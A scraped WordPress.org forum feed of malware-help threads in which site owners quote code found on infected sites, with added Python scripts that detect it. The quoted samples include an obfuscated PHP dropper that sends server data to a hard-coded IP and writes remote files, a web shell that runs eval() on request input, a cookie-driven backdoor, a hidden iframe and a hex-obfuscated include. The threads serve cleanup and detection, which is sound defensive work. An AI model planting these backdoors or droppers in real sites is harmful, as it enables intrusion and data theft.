Channel: Topic Tag: malware | WordPress.org
Viewing all 3861 articles

Malware Found On Site – Help With Deleting Files


Hi,

I’ve just paid for your premium plugin and after doing a malware scan I see my site is infected. It is likely from the (now deleted) plugin WP File Manager as my server host Cloudways alerted me to the vulnerable plugin.

This is a further message from Cloudways:

Thanks for getting in touch with us. I have checked the details and your site is infected with malware which is injected in a number of your files.

https://i.imgur.com/hws0mKx.png

This may be a result of a vulnerable plugin/theme you were using with your sites. Since we do not provide malware cleaning service, in this case, I would recommend you to either:

1. Scan your sites from a reliable security service.

So my question is, I don’t want to risk deleting any false positive files your scan has flagged, can you advise which ones are the actual malware I should delete please (including how to access and delete the file Cloudways support linked to: https://i.imgur.com/hws0mKx.png)

Thanks in advance for your help.

Tiffany


How to Identify & Prevent Future Threats?


Great plugin, it has detected and helped me remove the malicious code from my site… however, the infection keeps coming back, even after hardening my site.

How do I use the plugin to identify what the threat actually is? This might help me identify where the hole in my security is.

Steps I’ve performed:
- Reinstalling WP Core
- Reinstalling all Plugins
- Reinstalling theme
- WordFence scan and deleting or repairing infected files
- Changing passwords for WP and database
- Looking for hidden accounts in the database
- Changing FTP passwords
- Removing unauthorized FTP accounts

Here is the malicious code I’m finding in multiple files:
<?php if(!isset($incode)){$vl='h';$serverid='0bdf5b6877cf16717e02642fc9fc250d';$server_addr='219.95.83.119';function o0($oo0o,$oo,$oo0,$oO,$oOo,$ooooO){$o0oo0='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0';if(ini_get('allow_url_fopen')==1){$o000=stream_context_create(array($ooooO=>array('method'=>'POST','timeout'=>$oOo,'header'=>array('Content-type: application/x-www-form-urlencoded','User-Agent: '.$o0oo0,'content'=>http_build_query($_SERVER)))));if($oO=='yes'){$oo0o=$oo0o.'&type=fopen';}$ooo=@file_get_contents($oo0o,false,$o000);}elseif(in_array('curl',get_loaded_extensions())){if($oO=='yes'){$oo0o=$oo0o.'&type=curl';}$oo00O=curl_init();curl_setopt($oo00O,CURLOPT_URL,$oo0o);curl_setopt($oo00O,CURLOPT_HEADER,false);curl_setopt($oo00O,CURLOPT_RETURNTRANSFER,true);curl_setopt($oo00O,CURLOPT_TIMEOUT,$oOo);curl_setopt($oo00O,CURLOPT_USERAGENT,$o0oo0);if($ooooO=='https'){curl_setopt($oo00O,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($oo00O,CURLOPT_SSL_VERIFYHOST,false);}curl_setopt($oo00O,CURLOPT_CONNECTTIMEOUT,5);curl_setopt($oo00O,CURLOPT_POSTFIELDS,http_build_query($_SERVER));$ooo=@curl_exec($oo00O);curl_close($oo00O);}else{if($oO=='yes'){$oo0=$oo0.'&type=socks';}if($ooooO=='https'){$ooO=fsockopen('ssl://'.$oo,443,$o0Ooo,$oO0,$oOo);}else{$ooO=fsockopen($oo,80,$o0Ooo,$oO0,$oOo);}if($ooO){stream_set_timeout($ooO,$oOo);$oO0Oo=http_build_query($_SERVER);$o0O='POST '.$oo0.' 
HTTP/1.0'."\r\n";$o0O.='Host: '.$oo."\r\n";$o0O.='User-Agent: '.$o0oo0."\r\n";$o0O.='Content-Type: application/x-www-form-urlencoded'."\r\n";$o0O.='Content-Length: '.strlen($oO0Oo)."\r\n\r\n";fwrite($ooO,$o0O);fwrite($ooO,$oO0Oo);$oooO='';while(!feof($ooO)){$oooO.=fgets($ooO,4096);}fclose($ooO);list($ooOO,$oO0oo)=@preg_split("/\R\R/",$oooO,2);$ooo=$oO0oo;}}return$ooo;}function ooO($o0OO){$o0oo[0]=(int)($o0OO/256/256/256);$o0oo[1]=(int)(($o0OO-$o0oo[0]*256*256*256)/256/256);$o0oo[2]=(int)(($o0OO-$o0oo[0]*256*256*256-$o0oo[1]*256*256)/256);$o0oo[3]=$o0OO-$o0oo[0]*256*256*256-$o0oo[1]*256*256-$o0oo[2]*256;return''.$o0oo[0].".".$o0oo[1].".".$o0oo[2].".".$o0oo[3];}function o0O00($o0o0){$o0Oo=array();$o0Oo[]=$o0o0;foreach(scandir($o0o0) as$oo00){if($oo00=='.'||$oo00=='..'){continue;}$oOO0=$o0o0.DIRECTORY_SEPARATOR.$oo00;if(is_dir($oOO0)){$o0Oo[]=$oOO0;$o0Oo=array_merge($o0Oo,o0O00($oOO0));}}return$o0Oo;}$oOoo=@preg_replace('/^www\./','',$_SERVER['HTTP_HOST']);$oo=ooO('3104709758');$oo0='/get.php?spider&checkdomain&host='.$oOoo.'&serverid='.$serverid.'&stookfile='.__FILE__;$oo0o='http://'.$oo.'/get.php?spider&checkdomain&host='.$oOoo.'&serverid='.$serverid.'&stookfile='.__FILE__;$oo0OO=o0($oo0o,$oo,$oo0,$oO='no',$oOo='30',$ooooO='http');if($oo0OO!='havedoor|havedonor'){$o0=$_SERVER['HTTP_HOST'];$oo0O=@preg_replace('/^www\./','',$_SERVER['HTTP_HOST']);$oO00=$_SERVER['DOCUMENT_ROOT'];chdir($oO00);$o0Oo=o0O00($oO00);$o0Oo=array_unique($o0Oo);foreach($o0Oo as$oo00){if(is_dir($oo00)&&is_writable($oo00)){$o0O0o=explode(DIRECTORY_SEPARATOR,$oo00);$oOo0=count($o0O0o);$oOoOo[]=$oOo0.'|'.$oo00;}}$oOo0=0;foreach($oOoOo 
as$ooo0){if(count($oOoOo)>1&&(strstr($ooo0,'/wp-admin')||strstr($ooo0,'/cgi-bin'))){unset($oOoOo[$oOo0]);}$oOo0++;}if(!is_writable($oO00)){natsort($oOoOo);$oOoOo=array_values($oOoOo);$ooo0=explode('|',$oOoOo[0]);$ooo0=$ooo0[1];}else{$ooo0=$oO00;}chdir($ooo0);if(stristr($oo0OO,'nodoor')){$oo0o='http://'.$oo.'/get.php?vl='.$vl.'&update&needfilename';$oo0='/get.php?vl='.$vl.'&update&needfilename';$o0o=o0($oo0o,$oo,$oo0,$oO='no',$oOo='55',$ooooO='http');$oo0oO=explode('|||||',$o0o);$oOoOO=$oo0oO[0].'.php';$o00o=$oo0oO[1];file_put_contents($ooo0.DIRECTORY_SEPARATOR.$oOoOO,$o00o);$o00=str_replace($oO00,'',$ooo0);if($_SERVER['SERVER_PORT']=='443'){$ooooO='https';}else{$ooooO='http';}$oo0o=$ooooO.'://'.$o0.$o00.'/'.$oOoOO.'?gen&serverid='.$serverid;$oo0=$o00.'/'.$oOoOO.'?gen&serverid='.$serverid;$ooOoO=o0($oo0o,$o0,$oo0,$oO='no',$oOo='55',$ooooO);}elseif(stristr($oo0OO,'needtoloadsomefiles')){shuffle($oOoOo);$ooo0=explode('|',$oOoOo[0]);$ooo0=$ooo0[1];$o00=str_replace($oO00,'',$ooo0);$o0oO='stuvwxyz';$oOoOO=str_shuffle($o0oO).'.php';$ooOo=urlencode($ooooO.'://'.$o0.$o00.'/'.$oOoOO);$oo0o='http://'.$oo.'/get.php?bdr&url='.$ooOo;$oo0='/get.php?bdr&url='.$ooOo;$ooo=o0($oo0o,$oo,$oo0,$oO='no',$oOo='20',$ooooO='http');file_put_contents($ooo0.DIRECTORY_SEPARATOR.$oOoOO,$ooo);}elseif(stristr($oo0OO,'needtoloadclient')){$oo0o='http://'.$oo.'/get.php?getclient&domain='.$oo0O;$oo0='/get.php?getclient&domain='.$oo0O;$ooo=o0($oo0o,$oo,$oo0,$oO='no',$oOo='55',$ooooO='http');if($ooo!='noclient'){$oOO0o=explode('::::',$ooo);$ooO0=$oOO0o[0];$ooOOO=$oOO0o[1];if(file_exists($ooO0)){if(!is_writable($ooO0)){@chmod($ooO0,'0644');@file_put_contents($ooO0,$ooOOO);if(!is_writable($ooO0)){@unlink($ooO0);@file_put_contents($ooO0,$ooOOO);}}else{@file_put_contents($ooO0,$ooOOO);}}else{@file_put_contents($ooO0,$ooOOO);}}}elseif($oo0OO=='needtowait'){}if(stristr($oo0OO,'nodonor')){}}$incode=1;}?><?php
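An added triage script for the sample quoted in this post (written for this page; not code from the poster, from Wordfence or from any plugin): it decodes the integer the sample hands to its ooO() function with the same arithmetic the sample uses, which names the host the dropper polls with /get.php?spider&checkdomain&...; it reproduces the sample's choice of drop directory (every writable directory under the document root, minus paths containing /wp-admin or /cgi-bin when more than one candidate remains, the document root itself if writable, otherwise the shallowest candidate); and it flags the two shapes of file the sample leaves behind, a PHP file that starts with the `if(!isset($incode))` guard and an eight-letter permutation of `stuvwxyz` with a `.php` extension, which is how the `needtoloadsomefiles` branch names its file. The directory tree it scans by default is constructed for the demonstration; pass a real document root as the first argument to scan a site.

```python
"""Triage for the $incode dropper quoted above: where it phones home, where it
can write, and what its dropped files look like. Added example for this page,
not code from the poster or from any plugin."""
import os
import re
import sys
import tempfile


def int_to_ip(n: int) -> str:
    """Same arithmetic as the sample's ooO(): a 32-bit integer to a dotted quad."""
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


# The literal the sample passes to ooO(); decoding it names the host it polls
# with /get.php?spider&checkdomain&host=...&serverid=...&stookfile=...
C2_HOST = int_to_ip(3104709758)

# Reply strings the dropper branches on, copied from the sample.
C2_TOKENS = (b"havedoor|havedonor", b"nodoor", b"needtoloadsomefiles",
             b"needtoloadclient", b"needtowait", b"nodonor")

# The sample is prepended to existing PHP files and guards itself with $incode.
PREPEND_RE = re.compile(rb"<\?php\s*if\s*\(\s*!\s*isset\s*\(\s*\$incode\s*\)\s*\)")


def is_shuffled_name(filename: str) -> bool:
    """The needtoloadsomefiles branch names its file str_shuffle('stuvwxyz').'.php'."""
    stem, ext = os.path.splitext(filename)
    return ext == ".php" and sorted(stem) == list("stuvwxyz")


def candidate_drop_dirs(docroot: str) -> list:
    """Directories the dropper can write into, shallowest first.

    The sample collects every writable directory under the document root,
    discards /wp-admin and /cgi-bin when more than one candidate remains, and
    then writes into the document root if it is writable, otherwise into the
    shallowest remaining directory (natsort on "depth|path"); the
    needtoloadsomefiles branch instead picks one of the candidates at random.
    """
    writable = [d for d, _, _ in os.walk(docroot) if os.access(d, os.W_OK)]
    if len(writable) > 1:
        writable = [d for d in writable
                    if "/wp-admin" not in d and "/cgi-bin" not in d]
    return sorted(writable, key=lambda d: (d.count(os.sep), d))


def find_dropped(docroot: str, max_read: int = 2 * 1024 * 1024) -> list:
    """Return (path, reason) for files matching the dropper's own signatures."""
    hits = []
    for dirpath, _, files in os.walk(docroot):
        for name in files:
            path = os.path.join(dirpath, name)
            if is_shuffled_name(name):
                hits.append((path, "shuffled stuvwxyz filename"))
                continue
            if not name.endswith(".php"):
                continue
            with open(path, "rb") as fh:
                head = fh.read(max_read)
            if PREPEND_RE.search(head[:256]):
                hits.append((path, "$incode prepend"))
            elif any(tok in head for tok in C2_TOKENS):
                hits.append((path, "C2 reply token"))
    return hits


def build_demo_tree(base: str) -> str:
    """Constructed site: a clean file, a prepended file and a dropped file."""
    root = os.path.join(base, "public_html")
    for sub in ("wp-admin", "wp-includes", "wp-content/uploads"):
        os.makedirs(os.path.join(root, *sub.split("/")))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php\nrequire __DIR__ . '/wp-blog-header.php';\n")
    with open(os.path.join(root, "wp-includes", "example.php"), "w") as fh:
        fh.write("<?php if(!isset($incode)){ /* ... needtoloadclient ... */ $incode=1;}?><?php\n"
                 "// original file body follows\n")
    with open(os.path.join(root, "wp-content", "uploads", "wvuxtzys.php"), "w") as fh:
        fh.write("<?php /* constructed stand-in for a dropped file */\n")
    return root


def demo() -> dict:
    """Run every check over the constructed tree; paths relative to its root."""
    root = build_demo_tree(tempfile.mkdtemp())
    rel = lambda p: os.path.relpath(p, root).replace(os.sep, "/")
    return {"c2_host": C2_HOST,
            "drop_dirs": [rel(d) for d in candidate_drop_dirs(root)],
            "hits": sorted((rel(p), why) for p, why in find_dropped(root))}


if __name__ == "__main__":
    if len(sys.argv) > 1:           # real use: python triage.py /path/to/public_html
        print("C2 host:", C2_HOST)
        for p, why in find_dropped(sys.argv[1]):
            print(f"{why:28} {p}")
    else:
        print(demo())
```

The sample contacts its host every time an infected file runs and, unless the reply is `havedoor|havedonor`, writes a new file; so re-installing core and plugins without removing every prepended copy and every dropped file leaves the loop intact. The list of writable directories is also the list of places to consider making read-only for the web server user wherever the site does not need to write there.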

Malware Scanning, Jetpack Conflict


Dear, thank you very much for the great plugin.

When I go to Malware Scanning I see the following errors above. What can they be and how do I get rid of them?

Thanks a lot and stay healthy these days. Best wishes and a nice evening Neo

Warning: filemtime(): stat failed for //sites/website.com/jetpack-temp in /sites/website.com/wp-content/plugins/defender-security/app/module/scan/behavior/core-result.php on line 30

Warning: filesize(): stat failed for /sites/website.com/jetpack-temp in /sites/website.com/wp-content/plugins/defender-security/app/module/scan/behavior/core-result.php on line 31

File appears to be malicious


Dear MiniOrange Colleagues,

I deleted the MiniOrange Social Login plugin after receiving the following error message from Wordfence: https://prnt.sc/v90oy6

Critical Issue Found: File appears to be malicious: wp-content/plugins/miniorganze-login-openid/miniorange_openid_sso_settings_page.php.

Critical Issue Found: File appears to be malicious: wp-content/plugins/miniorganze-login-widget.php.

Is this a known issue? Any recommendations for remedies?

Thanks,
Nate

Great Plugin


Excellent WP scanner I’ve tried so far!!!

Wordfence malware alert Backdoor:PHP/reval.C.3102


Hi,

I received a Wordfence malware alert in one of my websites, regarding a Backdoor:PHP/reval.C.3102 script in wp-content/plugins/mainwp-child/mainwp-child.php file

Details:
The matched text in this file is:

$p = $_COOKIE;\x0d\x0a(count($p) == 8)?(($um = $p[59].$p[68]) && ($bk = $um($p[95].$p[75])) && ($_bk = $um($p[16].$p[38])) && ($_bk = $bk($p[43], $_bk($um($p[20])))) && @$_bk(

Is this real malware or a false positive?

Regards,
Roberto Jobet

virus


Hi,

I am surprised to find that in the table “wp_trp_original_strings” lakhs of unwanted URLs are being stored, and so too in their respective language tables.
You can see the screenshot:
http://prntscr.com/vei5q7
And these tables are growing day by day. It is now 2 GB.

Can you let me know where it is coming from?

Kindly help.

thanks

Plug in caused too much spam and Advertising mails


This plugin is not very helpful. I got tons of advertising and spam mails.

Deleted it and will never install it again.

There are better alternatives, completely free!
I won’t wonder if most feedback regarding this plugin is fake.


File Change Warning


Hi,

Lately I have received file warnings. Several times they are about these three:
config-transient.php
config-synced.php
config-livewaf.php

Is this something to worry about?

Regards,

LV

WordPress Backup Extraction on Windows. Threat Found. Exploit:JS/ShellCode.gen


Windows Defender discovered a threat while I was extracting a WordPress backup of my live site onto my localhost.

The warning is Exploit:JS/ShellCode.gen.

So I had a closer look at that file caches_data_thumb.php.

This is inside the directory “ppom_files”. Putting PPOM into google shows this was a plugin which was installed a while back to add extra options for WooCommerce products. This plugin was removed a while ago shortly after it was installed however the directories are still here.

I opened caches_data_thumb.php in my editor and it’s got some dodgy code in it with Chinese characters, see below:

<?php
header("Content-type:text/html;charset=gbk");
$password='wp_caches'; // also the name of the request parameter that is eval()'d below
$shellname='Hello By xxxx';
$myurl=null;
error_reporting(0);
ob_start();
define('myaddress',$_SERVER['SCRIPT_FILENAME']);
define('postpass',$password);
define('shellname',$shellname);
define('myurl',$myurl);
if(@get_magic_quotes_gpc()){
    foreach($_POST as $k => $v) $_POST[$k] = stripslashes($v);
    foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v);
}
if(isset($_REQUEST[postpass])){
hmlogin(2);
@eval($_REQUEST[postpass]); // any request carrying a wp_caches parameter has its value executed as PHP
exit;}
if($_COOKIE['postpass'] != md5(postpass)){
    if($_POST['postpass']){
        if($_POST['postpass'] == postpass){
            setcookie('postpass',md5($_POST['postpass']));
            hmlogin();
        }else{
            echo '<CENTER>用户或密码错误</CENTER>'; // "Wrong username or password"
        }
    }
    islogin($shellname,$myurl);
    exit;
}
if(isset($_GET['down'])) do_down($_GET['down']);
if(isset($_GET['pack'])){
    $dir = do_show($_GET['pack']);
    $zip = new eanver($dir);
    $out = $zip->out;
    do_download($out,$_SERVER['HTTP_HOST'].".tar.gz");
}
if(isset($_GET['unzip'])){
    css_main();
    start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']);
    exit;
}
define('root_dir',str_replace('\\','/',dirname(myaddress)).'/');
define('run_win',substr(PHP_OS, 0, 3) == "WIN");
define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME']));
$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
$doing = isset($_POST['doing']) ? $_POST['doing'] : "";
$path = isset($_GET['path']) ? $_GET['path'] : root_dir;
$name = isset($_POST['name']) ? $_POST['name'] : "";
$img = isset($_GET['img']) ? $_GET['img'] : "";
$p = isset($_GET['p']) ? $_GET['p'] : "";
$pp = urlencode(dirname($p));
if($img) css_img($img);
if($eanver == "phpinfo") die(phpinfo());
if($eanver == 'logout'){
    setcookie('postpass',null);
    die('<meta http-equiv="refresh" content="0;URL=?">');
}
// Menu of the shell's functions; the Chinese labels are translated in the comments.
$class = array(
// "Information operations": "Upload files", "Basic information", "System information", "Execute PHP script"
"信息操作" => array("upfiles" => "上传文件","phpinfo" => "基本信息","info_f" => "系统信息","phpcode" => "执行PHP脚本"),
// "Privilege escalation tools": "Execute SQL", "MySQL operations", "MySQL privilege escalation", "Serv-U privilege escalation", "Execute command", "Reverse-shell privilege escalation", "File download", "Port scan"
"提权工具" => array("sqlshell" => "执行SQL执行","mysql_exec" => "MYSQL操作","myexp" => "MYSQL提权","servu" => "Serv-U提权","cmd" => "执行命令","linux" => "反弹提权","downloader" => "文件下载","port" => "端口扫描"),
// "Batch operations": "Batch plant/clean page trojans", "Batch replace content", "Batch search fil..." (cut off in the post)
"批量操作" => array("guama" => "批量挂马清马","tihuan" => "批量替换内容","scanfile" => "批量搜索文

etc etc, goes on for 100s of lines...

Inside that directory there is other code too. An index.html with html for a landing page for a roof replacement company!

This leads me to believe this plugin has added, or allowed the upload of, malicious code.

Now my question is why has this happened? And how do I vouch for the integrity of my WooCommerce site and clean up this mess? And who’s to say there isn’t more of this garbage hiding out in sub-folders of sub-folders!
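Two of the fragments on this page are enough to write hunting rules for the "more of this hiding in sub-folders" question: the `@eval($_REQUEST[postpass])` in the shell above (the `postpass` constant is the `$password` string, so a request carrying that parameter gets its value executed), and the cookie-driven `$p = $_COOKIE; ... $um($p[95].$p[75])` text Wordfence matched in the mainwp-child thread further up. The added script below (written for this page, not part of any plugin or scanner) walks a document root and reports PHP files that sit inside data or upload directories where no PHP belongs, that pass request input to eval(), or that glue elements of a copied superglobal into a function name and call it. The tree it scans is constructed: the malicious bodies are the two quoted fragments placed in invented file names, and `ppom_files` is assumed to live under wp-content.

```python
"""Hunt for PHP web shells shaped like the two fragments quoted in the threads above.
Added example for this page; not code from any of the plugins discussed."""
import os
import re
import sys
import tempfile

# Directories that hold uploads or plugin data and should contain no PHP at all.
# 'uploads' is WordPress's own; 'ppom_files' is the directory named in the post
# above. Extend the set for other plugins that keep data under wp-content.
DATA_DIRS = {"uploads", "ppom_files"}

# eval() fed straight from request input, as in  @eval($_REQUEST[postpass]);
EVAL_RE = re.compile(rb"\beval\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\b")

# A superglobal copied into a short alias, as in  $p = $_COOKIE;
ALIAS_RE = re.compile(rb"(\$\w+)\s*=\s*\$_(?:REQUEST|GET|POST|COOKIE)\s*;")


def assembled_call(src: bytes) -> bool:
    """Detect the reval shape: alias elements glued together ($p[59].$p[68])
    and a variable function call taking alias elements as argument ($um($p[95]...))."""
    for m in ALIAS_RE.finditer(src):
        alias = re.escape(m.group(1))
        glued = re.search(alias + rb"\[\d+\]\s*\.\s*" + alias + rb"\[\d+\]", src)
        called = re.search(rb"\$\w+\s*\(\s*" + alias + rb"\[\d+\]", src)
        if glued and called:
            return True
    return False


def in_data_dir(relpath: str) -> bool:
    """True when any parent directory of relpath is one of DATA_DIRS."""
    return any(part in DATA_DIRS for part in relpath.split("/")[:-1])


def classify(relpath: str, src: bytes) -> list:
    """Return the reasons a PHP file is suspicious (empty list means no finding)."""
    reasons = []
    if in_data_dir(relpath):
        reasons.append("PHP inside a data/upload directory")
    if EVAL_RE.search(src):
        reasons.append("eval() of request input")
    if assembled_call(src):
        reasons.append("function name assembled from request fragments")
    return reasons


def scan(docroot: str, max_read: int = 4 * 1024 * 1024) -> dict:
    """Walk docroot and map each suspicious PHP file (relative path) to its reasons."""
    findings = {}
    for dirpath, _, files in os.walk(docroot):
        for name in files:
            if not name.endswith((".php", ".phtml", ".php5", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, docroot).replace(os.sep, "/")
            with open(path, "rb") as fh:
                src = fh.read(max_read)
            reasons = classify(rel, src)
            if reasons:
                findings[rel] = reasons
    return findings


# Constructed sample tree. The two malicious bodies are the fragments quoted in the
# posts above (the ppom_files shell's login block and the Wordfence matched text);
# the directory and file names around them are invented for the demonstration.
SAMPLE_FILES = {
    "wp-content/ppom_files/caches_data_thumb.php":
        b"<?php\n$password='wp_caches';\ndefine('postpass',$password);\n"
        b"if(isset($_REQUEST[postpass])){\n@eval($_REQUEST[postpass]);\nexit;}\n",
    "wp-content/plugins/example-plugin/example-plugin.php":
        b"<?php\n$p = $_COOKIE;\r\n(count($p) == 8)?(($um = $p[59].$p[68]) && "
        b"($bk = $um($p[95].$p[75])) && ($_bk = $um($p[16].$p[38])) && "
        b"($_bk = $bk($p[43], $_bk($um($p[20])))) && @$_bk(",
    # legitimate variable-function use: no alias of a superglobal, no glued fragments
    "wp-content/plugins/example-plugin/includes/callbacks.php":
        b"<?php\n$handler = 'sanitize_text_field';\n$value = $handler($_GET['q']);\n",
    "wp-content/uploads/2020/11/photo.jpg": b"\xff\xd8\xff\xe0 not php",
}


def demo() -> dict:
    """Write SAMPLE_FILES into a temporary docroot and scan it."""
    root = tempfile.mkdtemp()
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
    return scan(root)


if __name__ == "__main__":
    findings = scan(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for rel, reasons in sorted(findings.items()):
        print(rel)
        for why in reasons:
            print("   -", why)
```

A hit on a plugin file is a lead, not a verdict: whether the file differs from the release is settled by comparing it with the pristine copy of the same version from wordpress.org, so keep the finding and that diff together when reporting it.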

VIRUS – STAY AWAY


Don’t INSTALL THIS – it is a backdoor virus. STAY AWAY!!!!!!

*Known javascript malware


Hello friends
In the links below, my website is identified as malware:
https://www.virustotal.com/gui/url/2deba0ca78cb0a7781f3329e9618d31f33197d6f55586c6f7496cc1cc75dbc9b/detection

https://sitecheck.sucuri.net/results/sourcebaran.com

And it is said that the following code has a problem
“”””
</BODY></HTML><iframe src="http://dl.sourcebaran.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
“”””
But I cannot find and delete it.
Can anyone help?

Reliable and easy to setup


We hope that you will love PressLock as much as we do and find it useful and easy to use. Our team has worked their magic to bring you some of the most important security features, previously done by multiple other plugins, into one reliable tool. We invite you to give it a try and flag any questions or bugs you may encounter. Constructive feedback is highly appreciated!

Take care and be safe!
PressLock Team

Provides good options even with free plugins.


Although the firewall can only be enabled if you pay for a Sucuri subscription, this plugin definitely offers some worthwhile configuration measures that make it well worth the file size drawback of installing a new plugin.

Piece of code in wpincludes/default-constants.php


I found this piece of code in wpincludes/default-constants.php that Wordfence is alerting me about. Is this a hack?

/**
* @5fb3bde2e2336
* @var mixed
*/

$wp_woocommerce_plugin = ABSPATH . "\x74\x68\x65\x6d\x65\x73\x2f\x73\x71\x75\x61\x72" .
                         "\x65\x64\x2f\x69\x6e\x63\x2f\x77\x6f\x6f\x63\x6f" .
                         "\x6d\x6d\x65\x72\x63\x65\x2e\x61\x70\x69\x2e\x70" .
                         "\x68\x70"; // the escapes spell "themes/squared/inc/woocommerce.api.php"
if (file_exists($wp_woocommerce_plugin)){
    require_once($wp_woocommerce_plugin);
}

/**
* @5fb3bde2e2336
*/
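This post and the mainwp-child alert earlier on the page ask the same question: is the flagged file the released one or a modified copy? The added example below (written for this page; not code from WordPress, Wordfence or WP-CLI) answers it by hashing a tree against a manifest of expected MD5s, which for core is what api.wordpress.org/core/checksums/1.0/ returns for the installed version and locale, and for a plugin can be built from the release zip on wordpress.org; it reports modified, missing and unlisted PHP files. It also decodes the hex-escaped string the injected block builds, which resolves to `themes/squared/inc/woocommerce.api.php` under ABSPATH. The manifest and the release file bodies in the demonstration are constructed stand-ins; the injected block is the one quoted above.

```python
"""Is a flagged WordPress file the released one or a modified copy? Hash the tree
against a manifest of expected MD5s, and decode the hex-escaped path the
injected block above builds. Added example for this page; not code from
WordPress, Wordfence or WP-CLI."""
import hashlib
import os
import re
import tempfile

# The concatenated string literal from the default-constants.php post, as posted.
INJECTED_LITERAL = r'''"\x74\x68\x65\x6d\x65\x73\x2f\x73\x71\x75\x61\x72" .
                         "\x65\x64\x2f\x69\x6e\x63\x2f\x77\x6f\x6f\x63\x6f" .
                         "\x6d\x6d\x65\x72\x63\x65\x2e\x61\x70\x69\x2e\x70" .
                         "\x68\x70"'''


def decode_php_hex_string(expr: str) -> str:
    """Join the double-quoted pieces of a PHP '.' concatenation and resolve the
    backslash-x hex escapes the way the PHP parser does."""
    pieces = re.findall(r'"((?:[^"\\]|\\.)*)"', expr)
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})",
                  lambda m: chr(int(m.group(1), 16)), "".join(pieces))


def md5_file(path: str) -> str:
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_tree(root: str, manifest: dict, skip_prefixes=("wp-content/",)) -> dict:
    """Compare files under root with a {relative path: md5} manifest.

    'modified': listed file whose hash differs; 'missing': listed file absent;
    'unexpected': PHP file on disk the manifest does not list, outside the
    skipped prefixes (wp-content holds plugins and themes, checked separately).
    For core the manifest comes from api.wordpress.org/core/checksums/1.0/ for
    the installed version and locale; for a plugin, hash its release zip.
    """
    report = {"modified": [], "missing": [], "unexpected": []}
    on_disk = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            on_disk[os.path.relpath(full, root).replace(os.sep, "/")] = full
    for rel, expected in manifest.items():
        if rel not in on_disk:
            report["missing"].append(rel)
        elif md5_file(on_disk[rel]) != expected:
            report["modified"].append(rel)
    for rel in on_disk:
        if rel not in manifest and rel.endswith(".php") and not rel.startswith(skip_prefixes):
            report["unexpected"].append(rel)
    return {k: sorted(v) for k, v in report.items()}


# Constructed stand-ins for release files; the real ones are thousands of lines.
PRISTINE = {
    "wp-settings.php": b"<?php\n// constructed stand-in for the release file\n",
    "wp-includes/version.php": b"<?php\n$wp_version = '0.0.0-constructed';\n",
    "wp-includes/default-constants.php": b"<?php\nfunction wp_initial_constants() {\n}\n",
}
# The block the poster found in default-constants.php, as quoted above.
INJECTED_BLOCK = (b"\n/**\n* @5fb3bde2e2336\n* @var mixed\n*/\n\n"
                  b"$wp_woocommerce_plugin = ABSPATH . " + INJECTED_LITERAL.encode() + b";\n"
                  b"if (file_exists($wp_woocommerce_plugin)){\n"
                  b"    require_once($wp_woocommerce_plugin);\n}\n")


def demo() -> dict:
    """Build a manifest from PRISTINE, then write a tree with one modified, one
    missing and one unexpected file, and verify it."""
    manifest = {rel: hashlib.md5(body).hexdigest() for rel, body in PRISTINE.items()}
    root = tempfile.mkdtemp()
    on_disk = dict(PRISTINE)
    on_disk["wp-includes/default-constants.php"] += INJECTED_BLOCK        # modified
    del on_disk["wp-settings.php"]                                         # missing
    on_disk["wp-includes/extra.php"] = b"<?php // not in any release\n"    # unexpected
    on_disk["wp-content/plugins/example/example.php"] = b"<?php // out of scope here\n"
    for rel, body in on_disk.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
    return {"decoded": decode_php_hex_string(INJECTED_LITERAL),
            "report": verify_tree(root, manifest)}


if __name__ == "__main__":
    out = demo()
    print("injected path resolves to ABSPATH .", repr(out["decoded"]))
    for kind, files in out["report"].items():
        print(f"{kind:10}", ", ".join(files) or "-")
```

WP-CLI's `wp core verify-checksums` performs the same comparison for core against the live checksum API. A modified core file is a symptom: the path the block pulls in is the next file to inspect, and whatever wrote the block (a file manager plugin, reused FTP or admin credentials) is what has to be closed before the cleanup holds.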

Malware or NOT


Hi Everyone

I have been running this site, in my own perception, well enough, but lately something has happened and I have no idea what it is. I keep going down in my analytics. I tried Sucuri and see no problem. As I am just a basic-level user of WordPress, I need your help. Please tell me what might be wrong.

www.zoyuncak.com

WordFence reports logfile as possibly malicious


Hello,

I have installed the new version of the plugin for folks who paid the 15$ to support the developer(s), as suggested in the email. It’s now called «Backup Migrate» and comes in V 1.0. The link in the backend leads to an insecure URL «inchev.com», with no content.

WordFence warns me that the log-file of Backup Migrate contains executable php-code, which could be abused by hackers.

?

Thanks for any enlightenment

Constant Low Value Fake Orders From a Bot/Malware Script


As if Black Friday was not stressful enough. Since this morning there have been constant order attempts, some successful, for low value items (£4.95). They try over and over… and over again.

This is what the orders look like:
https://i.imgur.com/bi4en5w.png
And these are the payment attempts on each order:
https://i.imgur.com/oZtLTdG.png

I am manually adding their IPs to our .htaccess file; however, this bot changes IP as soon as they are blocked. I won’t be able to keep up. Some of the IPs I have blocked:

deny from 13.68.180.220
deny from 175.176.90.217
deny from 152.32.112.5
deny from 103.27.230.144
deny from 128.90.79.184
deny from 178.208.176.20

If they keep updating their IP address, I suppose there is just no way to sort this out, they will always have a way around whatever guards I put up?

Many thanks for any help or advice.

Wpadverts security breach on V. 1.5.0


Hello
One day after latest version 1.5.0 update, I had an attack via WP ADVERTS
My host told me the following :
